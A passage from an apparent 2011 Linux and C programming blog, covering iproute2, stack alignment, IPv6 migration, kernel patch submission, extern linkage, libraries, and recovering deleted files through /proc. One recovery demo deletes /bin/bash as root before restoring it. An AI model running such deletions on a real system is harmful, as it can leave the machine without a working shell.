alexj@hathor ~/techblog $ strace -e open ifconfig eth0 2>&1|grep /proc
open("/proc/net/dev", O_RDONLY) = 6
open("/proc/net/if_inet6", O_RDONLY) = 6
The cost of operations like open and read on these files is rather high compared to the netlink interface. For comparison, let's assume that we have a large number of interfaces (128) with IPv4 and IPv6 addresses and their associated connected routes.
alexj@hathor ~/if $ time ifconfig -a >/dev/null
real 0m1.528s
user 0m0.080s
sys 0m1.420s
alexj@hathor ~/if $ time ip addr show >/dev/null
real 0m0.016s
user 0m0.000s
sys 0m0.012s
But most normal users are not geeky enough to care about a speedup measured in milliseconds. They do, however, care about usability. And iproute2 does seem to have a better user interface. The ip command is better organized, around what its authors call objects. Links, addresses, routes, routing rules and tunnels are all objects that can be added, deleted or listed. A user who learns how to add an address can easily guess how to add a route, for example, because the syntax is similar.
Keyword shortening and auto-completion make the ip command more efficient by removing redundant characters. The following commands all have the same effect:
ip address show
ip address
ip addr show
ip a s
ip a
Some network engineers will like iproute2 because it's similar to Cisco's IOS: “ip route show” in Linux vs “show ip route” in IOS. Another usability feature is the /number (prefix length) format for subnet masks instead of the dotted-decimal format; the former is shorter to write and more in line with the concept of VLSM.
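The two mask notations carry the same information, and converting between them is mechanical. A short Python sketch using the standard ipaddress module (the two function names are made up for this example):

```python
import ipaddress


def prefix_to_netmask(prefix_length):
    """Convert a prefix length such as 24 to dotted-decimal, e.g. 255.255.255.0."""
    return str(ipaddress.ip_network(f"0.0.0.0/{prefix_length}").netmask)


def netmask_to_prefix(netmask):
    """Convert a dotted-decimal mask such as 255.255.254.0 to its prefix length."""
    return ipaddress.ip_network(f"0.0.0.0/{netmask}").prefixlen


print(prefix_to_netmask(26))
print(netmask_to_prefix("255.255.254.0"))
```

So an address that ifconfig would take as 192.168.1.10 with netmask 255.255.255.0 is written 192.168.1.10/24 for ip.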
So what does ifconfig still have to keep it around? Its biggest weakness is also its biggest strength: its age. ifconfig has been out and in use for so long that it's very hard to put it away. Many scripts at the heart of Linux distributions still rely on ifconfig to work, and most system administrators are used to the ifconfig command, so it's hard to move them to something new and unfamiliar. A lot of tutorials on the Internet about network configuration teach beginners ifconfig and not iproute2. For example, LPIC-1, one of the biggest Linux certifications out there, still requires ifconfig skills for passing the exam and barely mentions iproute2.
When released, iproute2 had at least one advantage over ifconfig, and that was the feature of interacting with the IPv6 stack while ifconfig was only for IPv4. But since then, fans of ifconfig patched it so it could also be IPv6 ready.
But other features were not replicated. In old Linux kernels, an interface could have only one IP address, so in ifconfig you could configure only one IP address on an interface. In newer kernels, each interface has a list of addresses, and iproute2 can manage them via the Netlink interface. The latest ifconfig versions still rely on the idea of subinterfaces to provide more than one address on an interface.
So, given all these arguments, iproute2 should be declared the winner. But it’s not that easy. Just like in the case of IPv4 vs IPv6, where the latter one is the obvious choice, iproute2 will eventually replace ifconfig. Only it’s going to take a long time for that to happen, so net-tools will still be around for some time, but they will be eventually phased out.
16 January 2012 10:00 PM
17 December 2011
Stack space is the part of each process’ virtual memory where function arguments and return addresses are stored, along with local variables declared within a function. Usually, the stack begins at the high address space of the virtual memory and grows down.
At every function call, a new stack frame is created on the stack. It contains the parameters sent to the function, the return address (the address of a code in the caller function) and the locally declared variables.
For each function call, the SP/ESP (Stack Pointer/Extended Stack Pointer) is adjusted so that the stack is big enough to accommodate the local variables. For example, in theory, if you have a local char variable and an int variable, the SP should be moved by 5 bytes.
In practice, the compiler will allocate stack space a little different than expected. It will allocate local variables space in increments of a fixed size, so sometimes having two int variables or three int variables will be the same.
As an example, gcc will allocate in increments of 16 bytes. Let’s make an experiment… we take a simple C program and turn into assembly code.
The C file looks something like this:
int main(void)
{
    int a=1, b=2;
    return 0;
}
The variables must be used after declaration or they will be ignored by the compiler.
The resulting assembly code (obtained with gcc -S) looks like this:
main:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
movl $1, -4(%ebp)
movl $2, -8(%ebp)
movl $0, %eax
leave
ret
Notice the subl instruction that reserves 16 bytes of stack space by decrementing ESP. Those 16 bytes are enough for four 32-bit integers. If you have 1, 2, 3 or 4 local variables declared (and used), you get those 16 bytes.
If we declare 5 integers, the allocated space will now be 32 bytes. Same thing for 6, 7, or 8. If we have 9 to 12 integers the compiler will allocate 48 bytes. And so on…
What if we don’t only have integers? Let’s add some chars.
int main(void)
{
    int a=1, b=2;
    char c=3, d=4;
}
Result:
main:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
movl $1, -8(%ebp)
movl $2, -12(%ebp)
movb $3, -1(%ebp)
movb $4, -2(%ebp)
movl $0, %eax
leave
ret
The function would need 10 bytes, but still gets 16. So the allocation is in increments of 16 bytes no matter what.
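The pattern in these experiments can be captured in a few lines of Python. This is only a sketch that models the numbers observed above (the function name reserved_stack_bytes and the fixed 16-byte increment are assumptions made for illustration); it is not how gcc actually computes its frame layout.

```python
def reserved_stack_bytes(local_bytes, increment=16):
    """Round the space needed by locals up to the next multiple of increment."""
    if local_bytes <= 0:
        return 0
    # Ceiling division, then scale back up to bytes.
    return -(-local_bytes // increment) * increment


if __name__ == "__main__":
    # 4-byte ints, as in the experiments above
    for count in (1, 4, 5, 8, 9, 12):
        print(count, "ints ->", reserved_stack_bytes(4 * count), "bytes")
    # two ints and two chars need 10 bytes
    print("10 bytes of locals ->", reserved_stack_bytes(10), "bytes")
```

Any amount of locals between 1 and 16 bytes lands in the first 16-byte step, which is why one int, four ints, or two ints plus two chars all produce the same subl instruction.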
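The question remains: why? It has to do with alignment. By default, gcc on x86 keeps the stack aligned to a 16-byte boundary (the -mpreferred-stack-boundary option controls this), so the space reserved for local variables is rounded up accordingly. The compiler tries to structure memory usage so that data can be easily fetched from memory and cached. A correct alignment keeps cache misses for memory accesses to a minimum.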
Credits to SofiaN for help with initial observations and tests.
17 December 2011 10:00 PM
02 December 2011
As we all know, IPv6 is the new protocol of the Internet that will replace the current version of IP (Internet Protocol), IPv4. It fixes the flaw of 32-bit addressing in IPv4, a flaw that led to the current shortage of usable addresses on the Internet.
The addressing issue is not something new. The IETF started looking into a replacement for IPv4 in 1992-1993, when it started the IPng (IP next generation) discussion group, and by 1996 it had the specifications for IPv6.
So, considering that the Internet is about 40 years old and the IPv4 addressing problem has been known for about half that time, why is IPv6 still not predominantly used, 15 years after it became available as a solution?
Probably the easiest way to build IPng would have been with backwards compatibility (for example, using a variable-length address, like OSI’s CLNP, where the whole IPv4 address space is just a part of the IPv6 space, using 32 bits). But the designers wanted to start from scratch and rewrite everything in order to fix other problems in IPv4 (like the now almost useless header checksum) and to add new features (like the extension headers that allow protocols like IPsec to be built into IPv6). The “rewrite everything” approach meant that almost all of the components of the network layer had to be rewritten, and this resulted in large groups of people being affected by the change.
First were the network administrators, the ones that had to ensure that their routers, multilayer switches, firewalls and wireless controllers were ready to be migrated. Most of the old equipment had to be replaced, or at least have its software updated. Current equipment does most of its packet processing in hardware to get better performance, but this is valid only for IPv4 packets. Hardware processing for IPv6 packets is something that only very new models of routers and switches do, and companies don’t really want to buy new equipment since the costs are rather high. Routing protocols had to be modified or rewritten. OSPFv3, the link-state protocol, and RIPng, the simple and lightweight distance-vector protocol, had to be implemented from scratch. More modular, IP-independent protocols like EIGRP and Integrated IS-IS needed new modules for the new protocol.
System administrators had the same concern: getting their services IPv6 ready. This ranges from setting up web services to listen on both protocols to the more difficult service, DNS. If DNS was a good thing to have in IPv4, in IPv6 it is critical (nobody wants to remember a number with 32 hexadecimal digits). The DNS protocol needed a new record type, the AAAA record, and a new reverse DNS zone, the ip6.arpa. zone.
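To get a feeling for why DNS matters so much here, the sketch below uses Python’s standard ipaddress module to print the fully expanded form of an IPv6 address and the name under ip6.arpa where its reverse (PTR) record would live. The address comes from the 2001:db8::/32 documentation range and the helper name describe_ipv6 is made up for this example.

```python
import ipaddress


def describe_ipv6(text):
    """Return (expanded form, number of hex digits, reverse DNS name)."""
    address = ipaddress.IPv6Address(text)
    expanded = address.exploded                 # all 8 groups, zero-padded
    digits = len(expanded.replace(":", ""))     # 128 bits / 4 bits per digit
    return expanded, digits, address.reverse_pointer


if __name__ == "__main__":
    expanded, digits, ptr_name = describe_ipv6("2001:db8::1")
    print(expanded)
    print(digits, "hexadecimal digits")
    print(ptr_name)
```

The reverse name spells out every one of the hexadecimal digits in reverse order, one label per digit, which is another reason nobody wants to maintain these zones by hand.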
But some of the frustrations of administrators and users are caused by bugs in software or even by missing implementations. Since all hardware needs software, IPv6 first of all needs software support. Kernel, system and application programmers needed to start building in support for IPv6. For example, people started patching Linux 2.1 back in 1996, but really stable, built-in support for IPv6 only came out in 2.6. Support in the kernel still didn’t mean that people could use it, because the userspace tools were lacking. The widely used ifconfig wasn’t built for v6, and only with the development of iproute2 could Linux users configure IPv6 on their boxes. Although considered deprecated, newer versions of ifconfig do support IPv6 address assignments. In the Windows world, things are worse, since only Windows 7 really has full support (kernel and user space tools) for IPv6.
Only after the IPv6 stack was built into the kernel (the network stack being one of the hardest parts of the kernel to program) could system programmers start porting their programs to be IPv6 ready. IPv4 and IPv6 sockets are not compatible, because IPv6 sockets use a different address family, AF_INET6. An IPv6-ready application also needs to keep working over IPv4, so it needs to be smart and know when to create a v4 connection or a v6 connection: a v6 infrastructure is only sometimes available, while a v4 infrastructure is almost surely there. And if both are available, which one do you choose? Maybe one works better than the other in that situation.
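One common answer to the “which one do you choose” question is to ask the resolver for every address of the host and try them in order of preference. The following Python sketch illustrates that idea with the standard socket module; the helper names, the IPv6-first policy and the timeout are assumptions made for this example, not a recommendation from the article.

```python
import socket


def order_candidates(candidates, prefer_ipv6=True):
    """Sort (family, sockaddr) pairs so the preferred family is tried first."""
    preferred = socket.AF_INET6 if prefer_ipv6 else socket.AF_INET
    # sorted() is stable, so the resolver's order is kept within each family.
    return sorted(candidates, key=lambda c: c[0] != preferred)


def connect_dual_stack(host, port, timeout=3.0):
    """Try every address returned for host: IPv6 first, IPv4 as fallback."""
    infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
    candidates = [(family, sockaddr) for family, _, _, _, sockaddr in infos]
    last_error = None
    for family, sockaddr in order_candidates(candidates):
        sock = socket.socket(family, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect(sockaddr)
            return sock                  # first address that answers wins
        except OSError as err:
            last_error = err
            sock.close()
    raise last_error or OSError("no addresses found for %s" % host)
```

The application code only sees a connected socket; whether it ended up being AF_INET or AF_INET6 is decided at connection time by what the network actually offers.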
So as we can see, there is not one group affected by the migration to IPv6, but rather an entire ecosystem, with several groups affecting each other.
02 December 2011 10:00 PM
27 November 2011
Suppose your favorite application or a library you are using has a bug. You find that the code is open source and are happy because of this. Being a programmer yourself, you know that you can fix the bug and send a patch with the fix to the maintainers. But how do you do this? This article will provide a short walkthrough for this task using as an example the Linux kernel. Different projects use different source version control systems. Because this article works on the kernel tree, I am going to use git as an example.
So, the first thing to do is to clone the project’s repository. This is to ensure that you are working on the latest source – maybe the bug was fixed before and your operating system’s package manager is behind on updates. For our kernel example, we will be cloning the net-next tree since this is where our final patch will land – from there it would be applied to the Linux kernel itself but this process is not the subject of this article.
$ git clone git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git
Cloning into 'net-next'...
remote: Counting objects: 2241130, done.
remote: Compressing objects: 100% (350702/350702), done.
remote: Total 2241130 (delta 1873243), reused 2236736 (delta 1869251)
Receiving objects: 100% (2241130/2241130), 442.07 MiB | 947 KiB/s, done.
Resolving deltas: 100% (1873243/1873243), done.
Next, create a new branch on which to work and check it out. All our work will be done there and we will use this branch later when constructing the patch to be sent upstream.
$ cd net-next/
$ git branch speedup_proc_net_dev
$ git checkout speedup_proc_net_dev
Switched to branch 'speedup_proc_net_dev'
Now, do your work: change the source, fix the bug or develop the improvement. Be sure to follow the coding standards of the project you are contributing to. Commit often, as told in the git article. At the end of the task, when everything is solved and you are ready to submit the patch, you can rebase the commits into a single one or into a set of commits, depending on their content. It is better to have a single logical change per commit, and your patch will have an increased chance of being accepted if each commit is small. When rebasing your commits, be sure to have a relevant commit message (as per the git article, for example). For the Linux kernel there is a standard even for the commit message. Start with a single line naming the component you’re patching, followed by a short description of the commit; then, after an empty line, write a longer message detailing what you have done. Add relevant information about the problem that you solved and, if possible, the tests made when developing your solution. Also add a Signed-off-by line. The following is an example of a good commit message.
dev: use name hash for dev_seq_ops
Instead of using the dev->next chain and trying to resync at each call to
dev_seq_start, use the name hash, keeping the bucket and the offset in
seq->private field.
Tests revealed the following results for ifconfig > /dev/null
* 1000 interfaces:
* 0.114s without patch
* 0.089s with patch
* 3000 interfaces:
* 0.489s without patch
* 0.110s with patch
* 5000 interfaces:
* 1.363s without patch
* 0.250s with patch
* 128000 interfaces (other setup):
* ~100s without patch
* ~30s with patch
Signed-off-by: Mihai Maruseac <mmaruseac@ixiacom.com>
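The three conventions mentioned above (a “component: description” subject line, an empty line before the body, a Signed-off-by line) are easy to check mechanically before sending anything. The following Python sketch does only that; the function name and the exact regular expressions are assumptions for illustration and are much looser than what kernel maintainers actually expect.

```python
import re

# "component: short description" on the first line
SUBJECT_RE = re.compile(r"^[^:\s][^:]*: \S.*$")
# "Signed-off-by: Name <user@host>"
SIGNOFF_RE = re.compile(r"^Signed-off-by: .+ <[^<>@\s]+@[^<>\s]+>$")


def check_commit_message(message):
    """Return a list of problems found in a commit message (empty if none)."""
    problems = []
    lines = message.strip("\n").split("\n")
    if not SUBJECT_RE.match(lines[0]):
        problems.append("subject should look like 'component: short description'")
    if len(lines) < 3 or lines[1] != "":
        problems.append("subject must be followed by an empty line and a longer body")
    if not any(SIGNOFF_RE.match(line) for line in lines):
        problems.append("missing Signed-off-by line")
    return problems


if __name__ == "__main__":
    example = (
        "dev: use name hash for dev_seq_ops\n"
        "\n"
        "Use the name hash instead of the dev->next chain.\n"
        "\n"
        "Signed-off-by: Jane Doe <jane@example.org>\n"
    )
    print(check_commit_message(example) or "looks fine")
```

A check like this only catches formatting slips; whether the message really explains the change is still up to the author.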
The next step is to create the patch files. We do this by switching to the master branch and doing a git format-patch operation.
$ git checkout master
Switched to branch 'master'
$ git format-patch master..speedup_proc_net_dev
0001-Speedup-proc-net-dev-filling.patch
As you see, in our case a single file was created since our speedup_proc_net_dev branch was only one commit ahead of the master branch (we previously rebased everything into a single commit). This will be the file containing our patch, the file we will send upstream. But before going there, we still have a lot of things to do.
First of all, we will need to check our patch for coding style mistakes. In the case of the Linux kernel there is a script doing that and we will use it. For other projects, we may need to do this step manually.
$ ./scripts/checkpatch.pl 0001-Speedup-proc-net-dev-filling.patch
total: 0 errors, 0 warnings, 122 lines checked
0001-Speedup-proc-net-dev-filling.patch has no obvious style problems and is ready for submission.
If there are problems we will have to go back to our branch, fix them, rebase all commits and recreate the patches with git format-patch. When everything is ready to be submitted we can send the patch to the developers via an email. In most projects you will simply create a bug report and attach the fix there and you are done. But since the Linux kernel is more complex we will have to use the email path presented in the following paragraphs.
First of all, we have to find where to send the patch. We have another script which can be used.
$ ./scripts/get_maintainer.pl 0001-Speedup-proc-net-dev-filling.patch
"David S. Miller" <davem@davemloft.net> (maintainer:NETWORKING [GENERAL],commit_signer:118/147=80%)
Eric Dumazet <eric.dumazet@gmail.com> (commit_signer:32/147=22%)
"Michał Mirosław" <mirq-linux@rere.qmqm.pl> (commit_signer:21/147=14%)
Jiri Pirko <jpirko@redhat.com> (commit_signer:15/147=10%)
Ben Hutchings <bhutchings@solarflare.com> (commit_signer:9/147=6%)
netdev@vger.kernel.org (open list:NETWORKING [GENERAL])
linux-kernel@vger.kernel.org (open list)
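Each line of this output holds one address followed by its role in parentheses, so the addresses can be pulled out with a short script instead of being copied by hand. The Python sketch below shows one way to do it; the function name and the split into mailing lists and people are assumptions made for this example and are not part of the kernel scripts.

```python
import re

# An address, optionally wrapped in <>, followed by "(role)" at the end of the line.
ADDRESS_RE = re.compile(r"<?([^\s<>()]+@[^\s<>()]+)>?\s*\((.*)\)\s*$")


def split_recipients(output):
    """Split get_maintainer.pl output into (mailing lists, people)."""
    lists, people = [], []
    for line in output.splitlines():
        match = ADDRESS_RE.search(line)
        if not match:
            continue                     # skip anything that is not an address line
        address, role = match.groups()
        (lists if "open list" in role else people).append(address)
    return lists, people


if __name__ == "__main__":
    sample = (
        '"David S. Miller" <davem@davemloft.net> (maintainer:NETWORKING [GENERAL])\n'
        "netdev@vger.kernel.org (open list:NETWORKING [GENERAL])\n"
        "linux-kernel@vger.kernel.org (open list)\n"
    )
    lists, people = split_recipients(sample)
    print("lists: ", lists)
    print("people:", people)
```

How the two groups are then distributed between recipient options is a matter of project etiquette, so the sketch stops at separating them.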
The addresses given as output are those where we will send our email. But, before sending the first email, we will have to configure git send-email. For example, adding the following lines to ~/.gitconfig will ensure that you can use Gmail as an SMTP server for sending the patch email.
[sendemail]
smtpencryption = tls
smtpserver = smtp.gmail.com
smtpuser = yourname@gmail.com
smtpserverport = 587
Now, we can send the email. We will have to manually fill in the --to and --cc options, or we can use a list of sed commands as suggested by the Chromium wiki. In our case we will do it manually just to exemplify all the steps; in real life it is better to use scripts whenever possible.
$ git send-email --to=netdev@vger.kernel.org \
> --cc=linux-kernel@vger.kernel.org \
> --cc=... 0001-Speedup-proc-net-dev-filling.patch
0001-Speedup-proc-net-dev-filling.patch
Who should the emails appear to be from? [Mihai Maruseac <mihai.maruseac@rosedu.org>]
Emails will be sent from: Mihai Maruseac <mihai.maruseac@rosedu.org>
Message-ID to be used as In-Reply-To for the first email?
....
After several more lines of output your mail will be sent. I have responded with the default entries to the above questions but the last one is very relevant, as we will see next.
After the mail is sent, it will appear on patchwork and on the mailing lists. You will wait until someone looks through your mail and analyzes your patch. Then, the patch can be applied or someone can report some problems to you. If there are some problems, you will go back and solve them and will resend the patch using the above methodology. This time, you will answer the Message-ID question with the ID taken from the first email. In our case, the patch was not accepted from the start and we had to reiterate. Thus, we answered that question with the ID taken from the initial patch: <1318412950-22014-1-git-send-email-mmaruseac@ixiacom.com>. Until the final patch was accepted I needed to send several versions.
Even though this lasted a whole week, the feeling I got when it was finally accepted was awesome. You will feel it too after sending the first few patches.
As a recommended link before the end of the article, make sure you watch the YouTube video of Greg KH about contributing upstream.
27 November 2011 10:00 PM
17 November 2011
A process is an instance of a binary executable file. This means that when you ‘run’ a binary, the code from the storage media is copied into the system’s memory, more precisely, into the process’ virtual memory space. From a single binary, several processes can be spawned.
The virtual memory of a process, made up of pages, is mapped to several things, like shared objects (libraries), shared memory, stack and heap space, read-only space and executable space. A good way to view what is mapped to what is with the pmap utility, or by just looking in the /proc directory hierarchy. The /proc/$PID/maps file (where $PID is the process ID of the targeted process) has the page mappings. Also in /proc/$PID, you can find other useful files, like the exe file, which is a symlink to the executable, or the fd directory, which contains symlinks to all the files opened as file descriptors in a process.
Besides useful information, what can we get out of procfs? Here is a situation that has been known to happen. You are in a console, with your bash shell, and you manage to delete some important files, like /bin/bash. Without that executable, you cannot run new shells and, after a restart, your system will be inaccessible. What can you do?
The bash executable no longer has a name on the hard drive, but the process you are currently running still maps it into its virtual memory. You can find out the PID of the current shell instance using the $$ special shell parameter. Knowing that, you can cd to /proc/$$ and access the content of the exe file there.
Although the exe file is shown as a link to the original file that is now deleted (thus the link should be broken), if you cat it, you will get its binary content: in fact, the whole original binary file. Here is the step-by-step process:
/bin # md5sum bash
e116963c760727bf9067e1cb96bbf7d3 bash
/bin # rm bash
/bin # echo $$
5051
/bin # cd /proc/$$
/proc/5051 # ls -la exe
lrwxrwxrwx 1 root root 0 2011-11-15 23:47 exe -> /bin/bash (deleted)
/proc/5051 # cat maps
[snip]
00f9e000-00f9f000 rw-p 0001c000 08:01 263123 /lib/i386-linux-gnu/ld-2.13.so
08048000-0810c000 r-xp 00000000 08:01 284760 /bin/bash (deleted)
0810c000-0810d000 r--p 000c3000 08:01 284760 /bin/bash (deleted)
0810d000-08112000 rw-p 000c4000 08:01 284760 /bin/bash (deleted)
[snip]
/proc/5051 # cat exe>/bin/bash_rescued
/proc/5051 # cd -
/bin # md5sum bash_rescued
e116963c760727bf9067e1cb96bbf7d3 bash_rescued
/bin # chmod +x bash_rescued
/bin # mv bash_rescued bash
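The lines printed by cat maps in the session above have a fixed layout: address range, permissions, offset into the file, device, inode and, for file-backed mappings, the path. A minimal Python sketch of a parser for one such line follows; the Mapping type and the function name are invented for this example.

```python
from collections import namedtuple

Mapping = namedtuple("Mapping", "start end perms offset dev inode path")


def parse_maps_line(line):
    """Parse one line of /proc/PID/maps into a Mapping tuple."""
    # At most 6 fields; the last one (the path) may contain spaces.
    fields = line.split(None, 5)
    start, end = (int(part, 16) for part in fields[0].split("-"))
    path = fields[5].strip() if len(fields) > 5 else ""   # anonymous mappings have no path
    return Mapping(start, end, fields[1], int(fields[2], 16),
                   fields[3], int(fields[4]), path)


if __name__ == "__main__":
    line = "08048000-0810c000 r-xp 00000000 08:01 284760 /bin/bash (deleted)"
    mapping = parse_maps_line(line)
    print(mapping.path, mapping.perms, hex(mapping.end - mapping.start))
```

Running the same function over every line of /proc/self/maps gives a quick overview of what a process has mapped and with which permissions.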
What other things can we rescue? How about a file that was opened by a process? For example, a video file, opened by a player:
alexj@hathor ~ $ md5sum movie.ogv
9f701e645fd55e1ae8d35b7671002881 movie.ogv
alexj@hathor ~ $ vlc movie.ogv &
[1] 6487
alexj@hathor ~ $ cd /proc/6487/fd
alexj@hathor /proc/6487/fd $ ls -la |grep movie
lr-x------ 1 alexj alexj 64 2011-11-16 00:11 23 -> /home/alexj/movie.ogv
alexj@hathor /proc/6487/fd $ rm /home/alexj/movie.ogv
alexj@hathor /proc/6487/fd $ ls -la |grep movie
lr-x------ 1 alexj alexj 64 2011-11-16 00:11 23 -> /home/alexj/movie.ogv (deleted)
alexj@hathor /proc/6487/fd $ cp 23 /home/alexj/movie_rescued.ogv
alexj@hathor /proc/6487/fd $ md5sum /home/alexj/movie_rescued.ogv
9f701e645fd55e1ae8d35b7671002881 /home/alexj/movie_rescued.ogv
These things are possible because the files are still kept and used by the kernel. The VFS (Virtual File System) still has references to the inodes of the files, and they won’t be released until the processes holding them finish.
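The same effect can be reproduced from a single program, without a video player. The Python sketch below creates a temporary file, deletes it while it is still open and then reads it back through /proc/self/fd; it is Linux-specific, and the function name is an assumption made for this example.

```python
import os
import tempfile


def rescue_deleted_file(data):
    """Write data to a file, delete it while open, and read it back via /proc."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, data)
        os.unlink(path)                        # the name is gone ...
        proc_path = "/proc/self/fd/%d" % fd    # ... but the inode is still referenced
        link_target = os.readlink(proc_path)   # old path followed by " (deleted)"
        with open(proc_path, "rb") as rescued:
            content = rescued.read()
        return link_target, content
    finally:
        os.close(fd)                           # only now can the kernel free the inode


if __name__ == "__main__":
    target, content = rescue_deleted_file(b"important data")
    print(target)
    print(content)
```

Once the last descriptor is closed, the inode is released and the data can no longer be recovered this way.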
Thanks to razvand and ddvlad for the idea of this article.
17 November 2011 10:00 PM
08 October 2011
The idea for this post came from Virgil’s comment on the char[] versus char* entry. We will dig into some of the internals of C’s extern keyword by means of examples and then analyze the differences between extern char* and extern char[].
extern is a storage class specifier, indicating that the actual storage of a variable or the definition of a function is located elsewhere, typically in another source file.
Let’s start with a simple example:
helper.c
int sample = 42; /* definition */
main.c
#include <stdio.h>
extern int sample; /* declaration */
int main(void)
{
    printf("sample = %d\n", sample);
    return 0;
}
Having obtained the corresponding object files helper.o and main.o we link them together into an executable named main. We will use the nm tool to check the symbols from each object file:
$ nm helper.o
00000000 D sample
$ nm main.o
U sample
00000000 T main
Notice that the symbol sample is only declared in main.c but not defined there. In the linking phase, the linker searches through all linked object files and finds that the actual storage for sample is defined in helper.o. As a result, our main executable will print the value 42 defined in the external file helper.c:
$ ./main
sample = 42
Now let’s see how the compiler behaves if the types for cross-referenced variables do not match:
foo.c
char *foo = "Hello";
main.c
void foo(void);
int main(void)
{
    foo();
    return 0;
}
$ gcc -Wall -c foo.c -o foo.o
$ gcc -Wall -c main.c -o main.o
$ gcc -o main main.o foo.o
$ ./main
Segmentation fault
Functions are extern by default, hence the declaration of the symbol foo in main.c allows the compiler to create the main.o object file without errors or warnings. However, the linker does not check the type of the symbol foo; thus, running the main executable results in a function call into a non-executable memory area.
Finally, let’s analyze if we can use a pointer and an array interchangeably between 2 source files.
First try. The file main.c declares an extern array of chars, leaving it to the linker to find the actual storage area defined for it. File pointer.c defines a pointer to a memory area holding a string literal. At link time, the symbol str from main.c is bound to a memory area representing the address of a string.
pointer.c
char *str = "1234";
char a = 'A'; /* memory guards */
char b = 'B';
char c = 'C';
main.c
#include <stdio.h>
extern char str[];
int main(void)
{
    printf("%s\n", str);
    return 0;
}
By compiling and linking main.c and pointer.c together we get the main executable.
$ ./main
\�ABC
Notice how the array str is mapped to a memory area where an address is stored. The printf function will display raw data until a \0 is encountered. Fortunately, because of our guard variables, printing stops after showing some garbage and the string ABC.
Second try. The file main.c declares a pointer to a memory area holding one or more characters. The linker will associate str from main.o with the storage defined by str array from array.o.
array.c
char str[] = "1234";
main.c
#include <stdio.h>
extern char *str;
int main(void)
{
    printf("%s\n", str);
    return 0;
}
By compiling and linking together these programs we notice that running the main executable results in a crash.
$ ./main
Segmentation fault
Let’s use GDB to see the reason:
$ gdb ./main
(gdb) b main
Breakpoint 1 at 0x8048385: file main2.c, line 6.
(gdb) run
Breakpoint 1, main () at main2.c:6
6 printf("%s\n", str);
(gdb) p str
$1 = 0x34333231 <Address 0x34333231 out of bounds>
One can notice that the value of the pointer str is the content of the array str: the bytes of "1234" are read as an address. Dereferencing this invalid address results in the delivery of the dreaded SIGSEGV signal.
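The value printed by gdb can be reproduced by hand. The short Python sketch below reinterprets the first four bytes of the string as a 32-bit little-endian integer, which is what happens on the 32-bit x86 machine used here when the array storage is read as a pointer; the function name is made up for the example.

```python
import struct


def bytes_as_pointer(data):
    """Interpret the first four bytes of data as a little-endian 32-bit address."""
    (value,) = struct.unpack("<I", data[:4])
    return value


if __name__ == "__main__":
    # '1' is 0x31, '2' is 0x32, '3' is 0x33, '4' is 0x34
    print(hex(bytes_as_pointer(b"1234\0")))
```

The lowest address holds the least significant byte, so the character '1' ends up at the right end of the hexadecimal value.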
08 October 2011 09:00 PM
02 October 2011
This article aims to shed some light on the topic of library management, with insight into the linker and loader. The ldconfig command, for example, is heavily used in Linux, though unknown to some users.
A library is a collection of object files “meshed” together in another file. Its benefit is avoiding “reinventing the wheel”. Once someone has implemented a given set of functionalities, they may store those in a library file; this file is distributed to others and used in various software projects. Libraries are heavily used in all modern operating systems; the greater part of packages in Linux distributions are library packages. One can barely imagine being able to do any kind of development without the presence of the C Standard Library on the local system.
Linking and Loading
A library is said to be “linked” together with other library files or object files into an executable. The executable integrates all required components from library files, avoiding the need of implementing these components from scratch.
Linking is thus the process where external references in each module (object file) are resolved; that is, undefined functions are looked up in other linked modules or library files and their code is used in the executable. The linker is the application responsible for resolving and integrating functions in the final executable file.
With respect to the phase when linking occurs, we differentiate between three types of linking:
- static linking
- load-time dynamic linking
- run-time dynamic linking
The above nomenclature is specific to MSDN (load-time dynamic linking and run-time dynamic linking) but it’s a good depiction of any system using dynamic linking.
When using static linking, required library function code is inserted into the executable at link-time. Link-time refers to the moment when the linker process (ld) is invoked (typically wrapped by the gcc command). The result is an executable that comprises all required code to create a process.
When using dynamic linking, the linker process does not integrate code from the library. It simply creates stubs in the executable code stating what library file should be looked for that function. The actual “linking”, that is the “integration” of code in the executable, is done later.
Depending on the “later” part of dynamic linking, we differentiate between two types of linking. Load-time is when a process is created from an executable; the loader is responsible for “transforming” an executable into a process (actually, it’s not a transformation, but an instantiation). Run-time is the time while the process is running (using memory space, running code on the CPU etc.).
For load-time dynamic linking, the linking is done at load-time. That is, when running the executable (./myexec) and when the process is created, code from the library is mapped into memory and then referred to by the newly created process. For run-time dynamic linking, a specialized API allows the developer to load the library code into memory and, on demand, use specific functions.
Library types
Modern OSes such as Windows, Linux, Mac OS X and other Unices use two types of libraries, strongly related to the types of linking shown above: static libraries and dynamic libraries. Static libraries are used in conjunction with static linking, while dynamic libraries with load-time/run-time dynamic linking.
Static libraries use the .a extension on Unix and .lib on Windows. Each time some modules are linked against a library file, static linking is enabled and code for functions used is copied into the executable file.
ar rc libtest.a module1.o module2.o
gcc -o myexec exec.o -L. -ltest
Dynamic libraries are called shared-object libraries on Unix and use the .so extension. On Windows, they are called dynamic-link libraries and use the .dll extension. If a module is linked against a shared-object library, only references to the library are filled in, no actual code is copied; that step is done later on (either at load-time or run-time).
In order to use a shared-object library for load-time linking, one would simply pass it as an argument to the linker:
gcc -shared -fPIC -o libtest.so module1.o module2.o
gcc -o myexec exec.o -L. -ltest
LD_LIBRARY_PATH=. ./myexec
When the loader creates a new process (LD_LIBRARY_PATH=. ./myexec), the library (libtest.so) is mapped into memory and necessary function code is accessed.
The use of run-time linking requires a specialized API for loading needed function code while the process is running: dlopen & friends. A sample is shown below:
void *handle;
double (*cosine)(double);
handle = dlopen("libm.so", RTLD_LAZY);   /* load the library at run-time */
cosine = dlsym(handle, "cos");           /* look up the address of cos() */
printf("%f\n", (*cosine)(2.0));
Unlike static and load-time dynamic linking, run-time dynamic linking doesn’t require the presence of a library argument to the link command (that is, -L. -ltest).
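Run-time dynamic linking is also what scripting languages rely on when they call into C libraries. As a sketch of the same cosine example, the Python code below uses the standard ctypes module, which wraps dlopen and dlsym on Unix systems; the fallback name libm.so.6 is a glibc-specific assumption and the function name is made up for this example.

```python
import ctypes
import ctypes.util


def load_cosine():
    """Load the C math library at run-time and return its cos() function."""
    # find_library may return None on some systems; "libm.so.6" is a
    # glibc-specific fallback and an assumption of this sketch.
    name = ctypes.util.find_library("m") or "libm.so.6"
    libm = ctypes.CDLL(name)             # dlopen() under the hood on Unix
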